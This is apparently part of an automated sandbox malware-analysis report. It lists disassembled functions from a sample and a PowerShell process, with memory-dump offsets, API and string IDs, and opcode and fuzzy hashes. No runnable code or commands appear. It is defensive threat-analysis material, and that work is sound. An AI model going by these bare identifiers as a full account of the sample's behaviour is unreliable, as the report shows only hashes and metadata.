                                                                                                                                                                                                                              • Associated: 00000002.00000002.1494938031.00007FF8E80E3000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff8e80d0000_SecuriteInfo.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: 00007E6784124
                                                                                                                                                                                                                              • String ID: key is too long.$msg is too long.
                                                                                                                                                                                                                              • API String ID: 2720604592-4266787399
                                                                                                                                                                                                                              • Opcode ID: 4edba86753bbf53e9ed72b284593eff54ee3166e4bb40e5b3186a5f1b6549472
                                                                                                                                                                                                                              • Instruction ID: a0a0a5b0f6ed0af8f26d8e8cc4f7a16471a6c668f150110a02e2893a720bc1eb
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4edba86753bbf53e9ed72b284593eff54ee3166e4bb40e5b3186a5f1b6549472
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B5314922A0CB8287EA20CB95E45037E63A0FB89BC4F444231DE9D47BD4DF7CE0458B06
                                                                                                                                                                                                                              Function 00007FF8E7A280D0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 68timeCOMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1490107533.00007FF8E7A21000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FF8E7A20000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1489932395.00007FF8E7A20000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1490107533.00007FF8E7AA3000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1490107533.00007FF8E7AA5000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1490107533.00007FF8E7ACD000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1490107533.00007FF8E7AD8000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1490107533.00007FF8E7AE3000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1493021775.00007FF8E7AE7000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1493179025.00007FF8E7AE9000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff8e7a20000_SecuriteInfo.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Time$System$File
                                                                                                                                                                                                                              • String ID: gfff
                                                                                                                                                                                                                              • API String ID: 2838179519-1553575800
                                                                                                                                                                                                                              • Opcode ID: a0b97f4aea56fea0423c07e2c95279f2c9599c66744ee81c656443d2e1a48d07
                                                                                                                                                                                                                              • Instruction ID: 28636ee2310a762c2f74da2b60308a4c5758b4675ba16397bb5dacc91cdfd48e
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a0b97f4aea56fea0423c07e2c95279f2c9599c66744ee81c656443d2e1a48d07
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E721E672B0868686EB94CFA9D40277D76E4E788BC8F448035EA5DC7795DE3CD1418702
                                                                                                                                                                                                                              Function 00007FF7EAD1F5B8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1469032874.00007FF7EAD01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EAD00000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1467847222.00007FF7EAD00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469085811.00007FF7EAD2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469130641.00007FF7EAD3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469130641.00007FF7EAD41000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469304096.00007FF7EAD44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff7ead00000_SecuriteInfo.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CurrentDirectory
                                                                                                                                                                                                                              • String ID: :
                                                                                                                                                                                                                              • API String ID: 1611563598-336475711
                                                                                                                                                                                                                              • Opcode ID: e8d367c4ea258391d160676196091cc4497c978f166048fd005a5cb1bdaac227
                                                                                                                                                                                                                              • Instruction ID: e5a636bf4574df351d9f193d1bc54ae2bd4c38df9f6831aaec94935af671b0e1
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e8d367c4ea258391d160676196091cc4497c978f166048fd005a5cb1bdaac227
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9421C362B0864181FB20EB21D04436DA3E1FBA8B44FC5417BD69D43698DF7CE545CB62
                                                                                                                                                                                                                              Function 00007FF7EAD0FD48 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1469032874.00007FF7EAD01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EAD00000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1467847222.00007FF7EAD00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469085811.00007FF7EAD2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469130641.00007FF7EAD3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469130641.00007FF7EAD41000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469304096.00007FF7EAD44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff7ead00000_SecuriteInfo.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ExceptionFileHeaderRaise
                                                                                                                                                                                                                              • String ID: csm
                                                                                                                                                                                                                              • API String ID: 2573137834-1018135373
                                                                                                                                                                                                                              • Opcode ID: b596af9f6a60738c50b353da5cbad86497326ffe12a5eabfdc94c01c9dae4a3e
                                                                                                                                                                                                                              • Instruction ID: 0f7d24ecbdfb765eea94364325dd8b81555a85adc87ed2c9e4b4c66f6e34aa2a
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b596af9f6a60738c50b353da5cbad86497326ffe12a5eabfdc94c01c9dae4a3e
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5E112E32618B8182EB61DF15E44035AB7E5FB88B98F684671DB8D07758DF3CD551CB10
                                                                                                                                                                                                                              Function 00007FF7EAD2073C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1469032874.00007FF7EAD01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EAD00000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1467847222.00007FF7EAD00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469085811.00007FF7EAD2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469130641.00007FF7EAD3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469130641.00007FF7EAD41000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469304096.00007FF7EAD44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff7ead00000_SecuriteInfo.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: DriveType_invalid_parameter_noinfo
                                                                                                                                                                                                                              • String ID: :
                                                                                                                                                                                                                              • API String ID: 2595371189-336475711
                                                                                                                                                                                                                              • Opcode ID: 68237dfdc7112287ec82a3b365f776b5c9f6f856de5878160eaa1a8f91e0357f
                                                                                                                                                                                                                              • Instruction ID: 6ac71f684b0196dc91a5adc0b388a21a3753f3f1d86e1d51e424bfae0a360557
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 68237dfdc7112287ec82a3b365f776b5c9f6f856de5878160eaa1a8f91e0357f
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0F018F6291C20686F721FF60946537EA3A0EF58745FC10077D54D83699DE7CE904CB36
                                                                                                                                                                                                                              Function 00007FF8E7A28B10 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 35timeCOMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1490107533.00007FF8E7A21000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FF8E7A20000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1489932395.00007FF8E7A20000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1490107533.00007FF8E7AA3000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1490107533.00007FF8E7AA5000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1490107533.00007FF8E7ACD000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1490107533.00007FF8E7AD8000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1490107533.00007FF8E7AE3000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1493021775.00007FF8E7AE7000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1493179025.00007FF8E7AE9000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff8e7a20000_SecuriteInfo.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Time$System$File
                                                                                                                                                                                                                              • String ID: gfff
                                                                                                                                                                                                                              • API String ID: 2838179519-1553575800
                                                                                                                                                                                                                              • Opcode ID: e25ff0695230b9ef20f6353c867282db066572866cf8b2610bfc2824b0035600
                                                                                                                                                                                                                              • Instruction ID: c772caa4f23d2346ca0b86c61077fe05ecd15184b6b6497cd99e8f35bee746b1
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e25ff0695230b9ef20f6353c867282db066572866cf8b2610bfc2824b0035600
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3C01D6E2B1864582EB60DB6AF80225967D1FBCC7C8F449032E75DCBB65EE2CD2018B01
                                                                                                                                                                                                                              Function 00007FF8E8137E7C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 32COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1496149556.00007FF8E8131000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FF8E8130000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1495728438.00007FF8E8130000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1496149556.00007FF8E8141000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1496149556.00007FF8E8143000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1496149556.00007FF8E8146000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1496995524.00007FF8E8147000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1497677293.00007FF8E8148000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff8e8130000_SecuriteInfo.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: getprotobyname
                                                                                                                                                                                                                              • String ID: protocol not found$s:getprotobyname
                                                                                                                                                                                                                              • API String ID: 402843736-630402058
                                                                                                                                                                                                                              • Opcode ID: bd65c5a6a88a43393fd174900b5279529262fcd64829d65dad74d3ec7435cd69
                                                                                                                                                                                                                              • Instruction ID: b394b34595add3da25030ec67a1c404293b37e70ab9279fb48a439a5f77c54cc
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: bd65c5a6a88a43393fd174900b5279529262fcd64829d65dad74d3ec7435cd69
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 08012C25A1CB4282EA109BA1E98467D63A0FF8ABD5F460831CA4E47B14DF3CE448C70A
                                                                                                                                                                                                                              Function 00007FF8E8133C78 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 27COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1496149556.00007FF8E8131000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FF8E8130000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1495728438.00007FF8E8130000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1496149556.00007FF8E8141000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1496149556.00007FF8E8143000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1496149556.00007FF8E8146000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1496995524.00007FF8E8147000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1497677293.00007FF8E8148000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff8e8130000_SecuriteInfo.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: inet_addr
                                                                                                                                                                                                                              • String ID: 255.255.255.255$illegal IP address string passed to inet_aton
                                                                                                                                                                                                                              • API String ID: 1393076350-3844699235
                                                                                                                                                                                                                              • Opcode ID: 228bed37441ba182da163e3ec653cc393a3f059738861f4e152d049502361bed
                                                                                                                                                                                                                              • Instruction ID: 458f4b1894a1e524c85def6b8c0a747f48e03447201c99f6ef8479169cc4e112
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 228bed37441ba182da163e3ec653cc393a3f059738861f4e152d049502361bed
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D1F062A0A1CA4292EA109BB1F84427D2361AF85BE0F511231E92E466E0DF3CD088C70A

                                                                                                                                                                                                                              Executed Functions

                                                                                                                                                                                                                              Function 00007FF886833DB1 Relevance: 2.6, Strings: 1, Instructions: 1357COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000B.00000002.1546431489.00007FF886830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886830000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_7ff886830000_powershell.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID: (7(k
                                                                                                                                                                                                                              • API String ID: 0-3806051746
                                                                                                                                                                                                                              • Opcode ID: 6f18a2a2409ba23e3b6d7d154033bbf679fb813a46419400f71b06805e33fe09
                                                                                                                                                                                                                              • Instruction ID: d1dae1ef7d8bfbbe98e0a09bff2d61409b78defda4047ea2f8557cb8e7a39d04
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6f18a2a2409ba23e3b6d7d154033bbf679fb813a46419400f71b06805e33fe09
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4782E222E0DBCB4FE3969A2859655B47BE1FF5A7A0F1902FBC08DC7193D9189C06C352
                                                                                                                                                                                                                              Function 00007FF8868367F5 Relevance: 1.7, Strings: 1, Instructions: 450COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000B.00000002.1546431489.00007FF886830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886830000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_7ff886830000_powershell.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID: X7(k
                                                                                                                                                                                                                              • API String ID: 0-2313428286
                                                                                                                                                                                                                              • Opcode ID: 0bde99f6abb225ad5a5761bde1bff5cdc0349949c2a1e67445936cdb58d1d0c4
                                                                                                                                                                                                                              • Instruction ID: 5ad618b1d2e1915f20c14b48d285cf473b3e3aac83cf12728673b1b7baa5a6bf
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0bde99f6abb225ad5a5761bde1bff5cdc0349949c2a1e67445936cdb58d1d0c4
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E0D1F721E0DA8B4FE7969B6C48659B5BBE0FF5A390F1801FED44DCB093D918AC85C352
                                                                                                                                                                                                                              Function 00007FF88676BCFA Relevance: 1.6, Strings: 1, Instructions: 378COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000B.00000002.1543807986.00007FF886760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886760000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_7ff886760000_powershell.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID: SR_H
                                                                                                                                                                                                                              • API String ID: 0-3537898935
                                                                                                                                                                                                                              • Opcode ID: 718e3b1110a5f40b5c9f94a7936f1fa4ca1547bd8425c0f7caa81dab3b78c0ff
                                                                                                                                                                                                                              • Instruction ID: 77a10931d63802d3c291b5ffe7b1ff14e0d840d88a92cc734a2e7826d00c2568
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 718e3b1110a5f40b5c9f94a7936f1fa4ca1547bd8425c0f7caa81dab3b78c0ff
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: DBB13932A0CA958FE746EA1C84B55E47BE1FF52760F1842BEC189CB193EE257816C7C1
                                                                                                                                                                                                                              Function 00007FF886769E58 Relevance: 1.6, Strings: 1, Instructions: 324COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000B.00000002.1543807986.00007FF886760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886760000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_7ff886760000_powershell.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID: Kfs
                                                                                                                                                                                                                              • API String ID: 0-118685348
                                                                                                                                                                                                                              • Opcode ID: 90e73baad9fd6efa86b5ea97b90a716bfa81ada7a4c1f0c5f9c5c23710fb93a8
                                                                                                                                                                                                                              • Instruction ID: 138253b875fbfbb3e91a6ecbfa3a80b183a392e4514288faedf4ab88bd0c0505
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 90e73baad9fd6efa86b5ea97b90a716bfa81ada7a4c1f0c5f9c5c23710fb93a8
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E1419023E0E6D64EEB43A76868751F67FA0FF53254B0942F7D088CB093E9196909C3C2
                                                                                                                                                                                                                              Function 00007FF88664E606 Relevance: 1.4, Strings: 1, Instructions: 129COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000B.00000002.1540335231.00007FF88664D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF88664D000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_7ff88664d000_powershell.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID: xrB
                                                                                                                                                                                                                              • API String ID: 0-2425350093
                                                                                                                                                                                                                              • Opcode ID: 6050160b71714ca60efe219cb34dd0e920e2d061e4a2d8bc3d35c7f06290a7f7
                                                                                                                                                                                                                              • Instruction ID: 376fa8005dc35531dcae2d37c357873f5cdf4e0628c163004ea9c222d4d9c97d
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6050160b71714ca60efe219cb34dd0e920e2d061e4a2d8bc3d35c7f06290a7f7
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9841057180DBC44FE756DB29A8558523FF0FF52260B1905EFD088CB1A3D624AC86C762
                                                                                                                                                                                                                              Function 00007FF886769880 Relevance: .1, Instructions: 128COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000B.00000002.1543807986.00007FF886760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886760000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_7ff886760000_powershell.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: 850cd7204762d9d80bfafd5e2b87f1363ab60c4ebaba0ff5fed33b3cdb614026
                                                                                                                                                                                                                              • Instruction ID: d5e8bcca0c3dfa88756acd4f4581ca90650ab7c49d2b57c4f68ae5b5985abeb8
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 850cd7204762d9d80bfafd5e2b87f1363ab60c4ebaba0ff5fed33b3cdb614026
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5631E53191CB888FDB589B5CA8466A97BF0FB99310F00426FE449D3292DA70AC15CBC2
                                                                                                                                                                                                                              Function 00007FF88683429F Relevance: .1, Instructions: 98COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000B.00000002.1546431489.00007FF886830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886830000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_7ff886830000_powershell.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: 5efb27feee0b16f1ee362c45330fabaee3761294bda91974dc5b4bdbbc87a2fa
                                                                                                                                                                                                                              • Instruction ID: de498ed2fc519a85cc982ed58ef4f1850080b80309059015507c69500d44f0f1
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5efb27feee0b16f1ee362c45330fabaee3761294bda91974dc5b4bdbbc87a2fa
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3821F232F0DA874FE3A9DA28966057466D1FF4C390FA901BAC00EC71A2DE28EC45C741
                                                                                                                                                                                                                              Function 00007FF88683459C Relevance: .1, Instructions: 63COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000B.00000002.1546431489.00007FF886830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886830000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_7ff886830000_powershell.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: b07f866d78660f7abf2ad80766f53959a26aee0f1c8c052453158fb4660ddc17
                                                                                                                                                                                                                              • Instruction ID: 4483367d6759d6ddc5c9941e40b0a941c9d25584eaec35e4b593ea3d80b6f572
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b07f866d78660f7abf2ad80766f53959a26aee0f1c8c052453158fb4660ddc17
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 98112132F0E9874FE3A6DB2895605B877E0FF087A0F5901BAD15EC7097EA18AC55C781
                                                                                                                                                                                                                              Function 00007FF8867633B5 Relevance: .0, Instructions: 49COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000B.00000002.1543807986.00007FF886760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886760000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_7ff886760000_powershell.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                                                                                                                                                                                              • Instruction ID: 5c69d1b182ff29aad37d74fbb171a4c525eef3961644124469c2ab0a3353ca0e
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C701A73110CB0C4FD744EF0CE051AA5B3E0FB95360F10056DE58AC3651DA36E882CB42
                                                                                                                                                                                                                              Function 00007FF88676C0E2 Relevance: .0, Instructions: 41COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000B.00000002.1543807986.00007FF886760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886760000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_7ff886760000_powershell.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: b18c5b4403144125643aa94798421553d35c8d2e07a4de8a7a6345a01da5d54b
                                                                                                                                                                                                                              • Instruction ID: c4e35dde06a2f9fd9186a5d528d3d39bc27d1f1c00a9ef893188da56bc068c19
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b18c5b4403144125643aa94798421553d35c8d2e07a4de8a7a6345a01da5d54b
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: DFF0303275C6044FDB4CEA1CF852DB573E1E7D9334B10026EE48BC2656D926E847C686
                                                                                                                                                                                                                              Function 00007FF88676C128 Relevance: .0, Instructions: 39COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              Memory Dump Source
